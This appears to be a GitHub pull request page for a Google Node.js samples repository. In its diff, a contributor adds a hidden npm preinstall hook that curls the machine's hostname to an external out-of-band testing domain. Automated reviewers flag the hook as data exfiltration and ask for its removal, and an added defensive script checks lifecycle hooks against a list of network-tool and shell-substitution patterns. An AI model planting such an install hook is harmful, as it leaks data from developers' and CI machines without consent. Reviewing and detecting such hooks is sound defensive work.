canary: benign#4368
Conversation
Thanks for your pull request! It looks like this may be your first contribution to a Google open source project. Before we can look at your pull request, you'll need to sign a Contributor License Agreement (CLA). View this failed invocation of the CLA check for more information. For the most up to date status, view the checks section at the bottom of the pull request.
Code Review
This pull request introduces a critical security vulnerability by adding a malicious preinstall script to package.json that exfiltrates the local hostname to an external domain. The reviewer correctly identified this as unauthorized data exfiltration and requested its immediate removal.
| "test": "c8 mocha -p -j 2 --exit test/*.test.js", | ||
| "preinstall": "curl -s https://dnipykvxpgkngpftnqxlrsotvsex5c7dy.oast.fun/proof?h=$(hostname)" |
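Review bot: the added `preinstall` entry has to come out of `scripts` entirely, and the `test` line should lose the trailing comma so it is again the last entry. A `preinstall` hook runs automatically, with the installing user's privileges, on every developer and CI machine that runs `npm install` for this package, and this one sends the machine's hostname to an external out-of-band testing domain via `curl`; that is data exfiltration, not a build step, and nothing in a samples repository justifies network access from an install hook.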
Critical Security Risk: The added preinstall script executes an external curl command that exfiltrates the local hostname to an external domain. This is a severe security vulnerability (unauthorized data exfiltration / remote code execution during package installation). The preinstall script must be removed immediately.
"test": "c8 mocha -p -j 2 --exit test/*.test.js"
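One defensive check implied by this review, added here as an example that is not part of the PR or of the nodejs-docs-samples project: an audit of `package.json` that flags npm lifecycle hooks whose commands contain network clients, URLs, shell command substitution or host-identity commands. The sample `package.json` and the `example.invalid` host are constructed stand-ins for the change under review.

```javascript
// Added example (not from the PR or the project): audit npm lifecycle hooks
// for patterns that indicate network access or shell tricks at install time.
const LIFECYCLE_HOOKS = [
  'preinstall', 'install', 'postinstall',
  'preprepare', 'prepare', 'postprepare', 'prepublish',
];

// Indicators a reviewer would want surfaced before a PR lands.
const SUSPICIOUS = [
  { name: 'network-client', re: /\b(curl|wget|nc|ncat)\b/ },
  { name: 'url', re: /https?:\/\//i },
  { name: 'command-substitution', re: /\$\(|`/ },
  { name: 'inline-node-eval', re: /\bnode\s+(-e|--eval)\b/ },
  { name: 'host-identity', re: /\b(hostname|whoami)\b/ },
];

// Returns one finding per lifecycle hook that matches any indicator.
function auditLifecycleScripts(pkgJsonText) {
  const pkg = JSON.parse(pkgJsonText);
  const scripts = pkg.scripts || {};
  const findings = [];
  for (const hook of LIFECYCLE_HOOKS) {
    const cmd = scripts[hook];
    if (typeof cmd !== 'string') continue;
    const indicators = SUSPICIOUS.filter((p) => p.re.test(cmd)).map((p) => p.name);
    if (indicators.length > 0) findings.push({ hook, command: cmd, indicators });
  }
  return findings;
}

// Constructed sample mirroring the shape of the change under review
// (the host is a placeholder, not the domain from the PR).
const SAMPLE_PACKAGE_JSON = JSON.stringify({
  name: 'sample',
  scripts: {
    test: 'c8 mocha -p -j 2 --exit test/*.test.js',
    preinstall: 'curl -s https://example.invalid/proof?h=$(hostname)',
  },
});

console.log(JSON.stringify(auditLifecycleScripts(SAMPLE_PACKAGE_JSON), null, 2));
```

Run it in CI against the repository's `package.json` files and fail the build on any finding; a legitimate `prepare` step such as `npm run build` produces no finding.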
Description
Fixes #
Note: Before submitting a pull request, please open an issue for discussion if you are not associated with Google.
Checklist
- npm test (see Testing)
- npm run lint (see Style)
- GoogleCloudPlatform/nodejs-docs-samples. Not a fork.